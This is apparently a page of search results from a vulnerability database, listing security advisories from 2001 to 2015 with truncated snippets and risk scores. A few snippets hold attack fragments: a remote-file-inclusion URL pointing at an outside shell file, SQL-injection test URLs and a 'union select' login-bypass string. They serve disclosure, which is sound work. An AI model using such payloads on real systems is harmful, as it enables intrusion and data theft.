
47153 matches found

securityvulns
added 2007/06/14 12:0 a.m. | 183 views

[Full-disclosure] [CVE-2007-2450]: Apache Tomcat XSS vulnerability in Manager

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2007-2450: Apache Tomcat XSS vulnerabilities in Manager Severity: low cross-site scripting Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.24 Tomcat...

3.5 CVSS | 7.5 AI score | 0.03291 EPSS
Exploits: 0
securityvulns
added 2003/08/04 12:0 a.m. | 183 views

Win32 Device Drivers Communication Vulnerabilities

Win32 Device Drivers Communication Vulnerabilities Proof Of Concept - Exploiting Norton AntiVirus Device Driver Written by Lord YuP / sEC-Labs ^ tkT Tested on NAV 2002! zipped exploit http://sec-labs.hack.pl DISCLAIMER: This paper is written in educational purposes only. Author, sEC-Labs, tkT tea...

0.1 AI score
Exploits: 0
securityvulns
added 2015/05/11 12:0 a.m. | 182 views

Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8

Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8 Author: Larry W. Cashdollar, @larry0 Date: 2015-03-29 Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration Vendor: http://www.videowhisper.com/...

0.4 AI score
Exploits: 0
securityvulns
added 2014/10/15 12:0 a.m. | 182 views

HttpFileServer code execution

Code execution via GET request...

7.5 CVSS | 1.9 AI score | 0.99323 EPSS
Exploits: 23 | References: 1 | Affected Software: 1
securityvulns
added 2014/04/08 12:0 a.m. | 182 views

[USN-2165-1] OpenSSL vulnerabilities

========================================================================== Ubuntu Security Notice USN-2165-1 April 07, 2014 openssl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

5 CVSS | 0.6 AI score | 0.99999 EPSS
Exploits: 88
securityvulns
added 2013/07/29 12:0 a.m. | 182 views

[security bulletin] HPSBMU02894 rev.1 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Access, Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03824583 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03824583 Version: 1 HPSBMU02894 rev....

7.5 CVSS | 1.3 AI score | 0.80318 EPSS
Exploits: 43
securityvulns
added 2012/08/13 12:0 a.m. | 182 views

Multiple vulnerabilities in PBBoard

Advisory ID: HTB23101 Product: PBBoard Vendor: www.pbboard.com Vulnerable Versions: 2.1.4 and probably prior Tested Version: 2.1.4 Vendor Notification: July 18, 2012 Public Disclosure: August 8, 2012 Vulnerability Type: SQL Injection CWE-89, Improper Authentication CWE-287, Improper Access Contro...

7.5 CVSS | 0.5 AI score | 0.03076 EPSS
Exploits: 10
securityvulns
added 2011/09/20 12:0 a.m. | 182 views

[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability (by ERPScan)

DSECRG-11-033 SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability XSS vulnerability found in pubDBLogon.jsp page of SAP Crystal Report Server 2008. Application: SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://www.sap.com Bugs: Linked...

0.2 AI score
Exploits: 0
securityvulns
added 2011/05/04 12:0 a.m. | 182 views

Cisco IOS UDP Denial of Service Vulnerability

Cisco IOS UDP Denial of Service Vulnerability ------------------------------------------------------------------ I. Summary Cisco routers running IOS 15.0 allows a remote attacker to cause a denial of service via a flood of UDP packets a randomly chosen UDP port...

2.7 AI score
Exploits: 0
securityvulns
added 2008/10/29 12:0 a.m. | 182 views

Writeup by Amit Klein (Trusteer): Address Bar Spoofing for IE6

Address Bar Spoofing Attacks against Microsoft Internet Explorer 6 Amit Klein, Trusteer Summary ======= IE6 is the second most popular web browser after IE7, with market share of around 25 according to recent surveys e.g. http://marketshare.hitslink.com/report.aspx?qprid=2. This write-up presents...

6.6 AI score
Exploits: 0
securityvulns
added 2007/05/08 12:0 a.m. | 182 views

pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability

pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! = OZELHAREKAT Author: iLker Kandemir [email protected] ScriptSite: http://pfa.netsliver.com/downloadpfa Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke Exploit: http://site/pfapath/index.php?repinc=http://shell.txt?...

0.7 AI score
Exploits: 0
securityvulns
added 2006/11/18 12:0 a.m. | 182 views

20/20 auto gallery [ multiples injection sql ]

vendor site:http://www.2020autogallery.com/ product:20/20 auto gallery bug:injection sql global risk:high injection sql get : http://site.com/vehiclelistings.asp?vehicleID='sql http://site.com/vehiclelistings.asp?categoryIDlist='sql http://site.com/vehiclelistings.asp?saletype='sql...

0.2 AI score
Exploits: 0
securityvulns
added 2003/12/29 12:0 a.m. | 182 views

[Full-Disclosure] php-ping: Executing arbritary commands

ppp-design found the following design error in php-ping: Details ------- Product: php-ping Affected Version: no version information included in the script Immune Version: latest version OS affected: all OS with php Vendor-URL: http://www.theworldsend.net/ Vendor-Status: informed, new version...

0.3 AI score
Exploits: 0
securityvulns
added 2001/03/16 12:0 a.m. | 182 views

vBulletin allows arbitrary code execution

OVERVIEW ======== vBulletin http://www.vbulletin.com is a commonly used web forum system written in PHP. One of its key features is use of templates, which allow the board administrator to dynamically modify the look of the board. vBulletin templates are parsed with the eval function. This could ...

0.5 AI score
Exploits: 0
securityvulns
added 2013/07/15 12:0 a.m. | 181 views

ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability

ESA-2013-045.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery aka “Lucky Thirteen” Vulnerability EMC Identifier: ESA-2013-045 CVE Identifier: CVE-2013-0169 Severity Rating: CVSS v2 Base Score: 2.6...

2.6 CVSS | 7.1 AI score | 0.35584 EPSS
Exploits: 1
securityvulns
added 2011/04/26 12:0 a.m. | 181 views

[security bulletin] HPSBMA02658 SSRT100413 rev.1 - Insight Control for Linux (IC-Linux), Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information Disclosure, Denial of Service (DoS)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02794777 Version: 1 HPSBMA02658 SSRT100413 rev.1 - Insight Control for Linux IC-Linux, Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information...

7.6 CVSS | 0.7 AI score | 0.22145 EPSS
Exploits: 0
securityvulns
added 2010/08/12 12:0 a.m. | 181 views

PR10-07: Unauthenticated File Retrieval (traversal) within ColdFusion administration console

PR10-07: Unauthenticated File Retrieval traversal within ColdFusion administration console Vulnerability found: 17th April 2010 Vendor informed: 19th April 2010 Vulnerability fixed: 10th August 2010 Severity: High Description: Adobe ColdFusion is a easy to use and very widely adopted Programming...

7.5 CVSS | 9.4 AI score | 0.99721 EPSS
Exploits: 13
securityvulns
added 2009/09/28 12:0 a.m. | 181 views

XSS and Content Spoofing vulnerabilities in CKEditor

Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor. XSS: This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style. a href="http://test"...

Exploits: 0
securityvulns
added 2009/05/26 12:0 a.m. | 181 views

Multiple vulnerabilities in several ATEN IP KVM Switches

Jakob Lell from the TU Berlin computer security working group http://www.agrs.tu-berlin.de/v-menue/agrechnersicherheit/parameter/en/ has discovered multiple vulnerabilities in several ATEN IP KVM Switches. Affected products: - ATEN KH1516i IP KVM Switch browser firmware version 1.0.063 - ATEN...

10 CVSS | 0.5 AI score | 0.03191 EPSS
Exploits: 0
securityvulns
added 2007/12/29 12:0 a.m. | 181 views

[Full-disclosure] Persits Software XUpload Control Buffer Overflow Exploit

I tried posting this yesterday, don't know what happened, anyhow, my advance apologies for any double posts. I took a shot at writing an exploit for this, so here goes. Code is inline and attached. ------------------------- !-- written by e.b. Persits Software XUpload Control AddFolder Buffer...

0.1 AI score
Exploits: 0
securityvulns
added 2012/12/18 12:0 a.m. | 180 views

FCKEditor File Upload Vulnerability

Description: There is no validation on the extensions when FCKEditor 2.6.8 ASP version is dealing with the duplicate files. As a result, it is possible to bypass the protection and upload a file with any extension. - Reference: http://www.exploit-db.com/exploits/23005/ vulnerable versions: prior...

1.4 AI score
Exploits: 0
securityvulns
added 2009/04/17 12:0 a.m. | 180 views

Phorum < 5.2.10 Cross-Site Scripting/Request Forgery

=cicatriz [email protected]==advisories= / / / / // / / // / o / / .-/ =Phorum 5.2.10 Cross-Site Scripting/Request Forgery==/= == =Advisory & Vulnerability Information=== Title: Phorum 5.2.10 Cross-Site Scripting/Request Forgery Advisory ID: VUDO-2009-1504 Advisory URL:...

6.2 AI score
Exploits: 0
securityvulns
added 2007/10/23 12:0 a.m. | 180 views

Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities

Title: Simple PHP Blog sphpblog = 0.5.1 Multiple Vulnerabilities Vendor: http://sourceforge.net/projects/sphpblog/ Advisory: http://acid-root.new.fr/?0:15 Author: DarkFig gmdarkfig at gmail dot com Released on: 2007/10/21 Changelog: ---------- L M H T Summary: Ip Spoofing X X Cross Site Scripting...

Exploits: 0
securityvulns
added 2007/04/11 12:0 a.m. | 180 views

Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

script : Battle.net Clan Script 1.5 file : login.php attack : injection sql auteur : h a c k e r X code : ------------------------------------------------------------------------------------------ line 9 -- $user = $POST'user'; line 10-- $pass = $POST'pass'; ..... ..... ..... line 21--...

1.9 AI score
Exploits: 0
securityvulns
added 2006/09/12 12:0 a.m. | 180 views

OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability

Update: 22:44 09/11/06 Subject: "OPENi-CMS 1.0.1config Remote File Inclusion Vulnerability " Vulnerable version: OPENi-CMS 1.0.1 Operating System: - All OS Vendor URL: Support - [email protected] Website - http://www.openi-cms.org/ Description: Openi-CMS he one software PHP Content Management...

0.6 AI score
Exploits: 0
securityvulns
added 2002/08/20 12:0 a.m. | 180 views

Apache 2.0.39 directory traversal and path disclosure bug

Auriemma Luigi, PivX security advisory AL001 Application: Apache WebServer http://httpd.apache.org Version: 2.0.39 and previous 2.0.x, ONLY on systems that supports backslash path delimiters Win/Netware/OS2 etc... Bug: Directory traversal vulnerability and path disclosure Risk high: An attacker c...

7.5 CVSS | 6.5 AI score | 0.69698 EPSS
Exploits: 0
securityvulns
added 2015/10/12 12:0 a.m. | 179 views

[USN-2744-1] Apport vulnerability

========================================================================== Ubuntu Security Notice USN-2744-1 September 24, 2015 apport vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

7.2 CVSS | 0.0091 EPSS
Exploits: 2
securityvulns
added 2015/05/12 12:0 a.m. | 179 views

Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability

,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team .. +---------------------------^----------| ,-------, | / XXXXXX /| / / XXXXXX / / / XXXXXX / / XXXXXX / / XXXXXX / ------' Exploit Title : Wolf CMS Arbitrary File Upload Exploit Date : 16 April 20...

0.1 AI score
Exploits: 0
securityvulns
added 2015/02/02 12:0 a.m. | 179 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5 CVSS | 1.6 AI score | 0.02789 EPSS
Exploits: 28 | References: 13 | Affected Software: 7
securityvulns
added 2013/07/19 12:0 a.m. | 179 views

SEC Consult SA-20130625-0 :: Multiple vulnerabilities in IceWarp Mail Server

SEC Consult Vulnerability Lab Security Advisory 20130625-0 ======================================================================= title: Multiple vulnerabilities in IceWarp Mail Server product: IceWarp Mail Server vulnerable version: =10.4.5 fixed version: 10.4.5-1 impact: Critical homepage:...

6.8 AI score
Exploits: 0
securityvulns
added 2011/09/26 12:0 a.m. | 179 views

Multiple vulnerabilities in Help Desk Software

Vulnerability ID: HTB23041 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinhelpdesksoftware.html Product: Help Desk Software Vendor: freehelpdesk.org http://freehelpdesk.org/ Vulnerable Version: 1.1b and probably prior Tested Version: 1.1b Vendor Notification: 17 August 2011...

0.9 AI score
Exploits: 0
securityvulns
added 2011/07/26 12:0 a.m. | 179 views

phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability

View here: https://www.stevenroddis.com/phpbb-ajax-chatshoutbox-mod-csrf-vulnerability/ Title: phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability Release Date: 2011-04-30 Product Affected: http://startrekaccess.com/community/viewtopic.php?f=127&t=8675 Responsible Disclosure: After repeated attempts ...

7.1 AI score
Exploits: 0
securityvulns
added 2011/04/21 12:0 a.m. | 179 views

Directory Traversal Vulnerability in Viola DVR VIO-4/1000

============================================================== Viola DVR VIO-4/1000 - Directory Traversal Vulnerability ============================================================== Software: Viola DVR VIO-4/1000 other products may be affected Vendor: http://www.videcon.co.uk/ Vuln Type: Directo...

0.6 AI score
Exploits: 0
securityvulns
added 2007/04/12 12:0 a.m. | 179 views

WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability

WebSPELL = 4.01.02 picture.php Remote File Disclosure Vulnerability Discovered by: Trex Visit: www.Trex-Online.net / www.UnderGround.ag Comment: Happy easter! / / / / / / / // / GIVE ME A CARROT OR I WILL O O/ BLOW UP YOUR HOUSE / / ^ / / / // / // /// Vulnerability 1: Advantage: works...

0.5 AI score
Exploits: 0
securityvulns
added 2007/01/24 12:0 a.m. | 179 views

[Aria-Security Team] MyBB Cross-Site Scripting

Aria-Security Team http://Aria-Security.com http://www.aria-security.com/forum/showthread.php?p=144 Contact: [email protected] Type:Remote Cross-Site Scripting Article on XSS: http://aria-security.net/xss.rar Discovered By Aria-Security Team Software: MyBB Explanation: First of all user...

0.9 AI score
Exploits: 0
securityvulns
added 2006/12/31 12:0 a.m. | 179 views

ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability

Title : ASPTicker 1.0 admin.asp Remote Login ByPass SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.aspapps.com $$ : $ 17.00 SQL--------------------------------------------------------- http://target/path//admin.aspByPass Example: //Password 'union select 0,0,0 from...

0.9 AI score
Exploits: 0
securityvulns
added 2006/07/24 12:0 a.m. | 179 views

PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

SolpotCrew Community PHP Event Calendar versi 1.4 pathtocalendar Remote File Inclusion Vendor site : http://www.softcomplex.com/products/phpeventcalendar/ Bug Found By :Solpot a.k.a k. Hasibuan 13th july 2006 contact: [email protected] Website : http://www.solpotcrew.org/adv/solpot-adv-01.t...

1.5 AI score
Exploits: 0
securityvulns
added 2005/10/12 12:0 a.m. | 179 views

[EEYEB20050708] Microsoft Distributed Transaction Coordinator Memory Modification Vulnerability

Microsoft Distributed Transaction Coordinator Memory Modification Vulnerability Release Date: October 11, 2005 Date Reported: July 8, 2005 Severity: High Remote Code Execution Vendor: Microsoft Systems Affected: Windows 2000 Server SP0 - SP4 - Vulnerable - Anonymous remotely exploitable by defaul...

5 CVSS | 6.2 AI score | 0.39128 EPSS
Exploits: 0
securityvulns
added 2001/09/25 12:0 a.m. | 179 views

twlc advisory: all versions of php nuke are vulnerable...

twlc security divison 24/09/2001 Php nuke BUGGED. Found by: LucisFero and supergate ./twlc Summary This time the bug is really dangerous...it allows you to 'cp' any file on the box... or even upload files... Systems Affected all the versions ARE vulnerable except '5.0 RC1' i wonder why a released...

7.1 AI score
Exploits: 0
securityvulns
added 2015/11/01 12:0 a.m. | 178 views

ntp multiple security vulnerabilities

Multiple memory corruptions...

7.8 CVSS | 1.7 AI score | 0.81762 EPSS
Exploits: 6 | References: 1 | Affected Software: 1
securityvulns
added 2014/10/15 12:0 a.m. | 178 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5 CVSS | 1.6 AI score | 0.2226 EPSS
Exploits: 33 | References: 30 | Affected Software: 19
securityvulns
added 2014/08/04 12:0 a.m. | 178 views

Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 #37 - Filter Bypass & Multiple Vulnerabilities

Document Title: =============== Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 37 - Filter Bypass & Multiple Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1103 Barracuda Networks Security ID BNSEC: BNSEC-1263...

6.8 AI score
Exploits: 0
securityvulns
added 2013/04/28 12:0 a.m. | 178 views

BF and IA vulnerabilities in IBM Lotus Domino

Hello 3APA3A! I want to warn you about Brute Force and Insufficient Authentication vulnerabilities in IBM Lotus Domino. These are vulnerabilities in Domino, which I've found at 03.05.2012 together with other holes. Last year I've announced multiple vulnerabilities in IBM software and after IBM...

Exploits: 0
securityvulns
added 2012/12/10 12:0 a.m. | 178 views

FortiWeb 4kC,3kC,1kC & VA - Cross Site Vulnerabilities

Title: ====== FortiWeb 4kC,3kC,1kC & VA - Cross Site Vulnerabilities Date: ===== 2012-12-01 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=702 VL-ID: ===== 702 Common Vulnerability Scoring System: ==================================== 2.1 Introduction: =============...

0.5 AI score
Exploits: 0
securityvulns
added 2012/10/29 12:0 a.m. | 178 views

Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities

Information leakage, multiple memory corruptions, crossite scripting, etc...

10 CVSS | 1.7 AI score | 0.42609 EPSS
Exploits: 11 | Affected Software: 3
securityvulns
added 2008/02/27 12:0 a.m. | 178 views

[ MDVSA-2008:050 ] - Updated cups packages fix multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2008:050 http://www.mandriva.com/security/ Package : cups Date : February 26, 2008 Affected: Corporate 3.0 Problem Description: Dave Camp at Critical Path Software discovered a buffer overflow in CUPS 1.1.23 and...

10 CVSS | 9.5 AI score | 0.05793 EPSS
Exploits: 2
securityvulns
added 2007/04/09 12:0 a.m. | 178 views

[Full-disclosure] Some 0day Pocs

Mati Aharoni muts .@. offensive-security.com mailto:[email protected] http://www.offensive-security.com My 7 line python fuzzer found several file format bugs in 3 hours. Quite alarming. No deep analysis was done, I leave that to the community. These are some of the results: file789-1.d...

0.8 AI score
Exploits: 0
securityvulns
added 2007/03/17 12:0 a.m. | 178 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

10 CVSS | 1.5 AI score | 0.36967 EPSS
Exploits: 6 | References: 17 | Affected Software: 20
securityvulns
added 2006/08/11 12:0 a.m. | 178 views

Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability

------------------------------------------------------------------------ ------------------- Mafia Moblog pathtotemplate Remote File Inclusion ------------------------------------------------------------------------ ------------------- Author : Sh3ll Date : 2006/04/30 HomePage : http://www.sh3ll....

1 AI score
Exploits: 0
securityvulns
added 2004/05/31 12:0 a.m. | 178 views

[waraxe-2004-SA#031 - Multiple vulnerabilities in e107 version 0.615]

================================================================================ waraxe-2004-SA031 ================================================================================ Multiple vulnerabilities in e107 version 0.615...

Exploits: 0

Total number of security vulnerabilities: 5000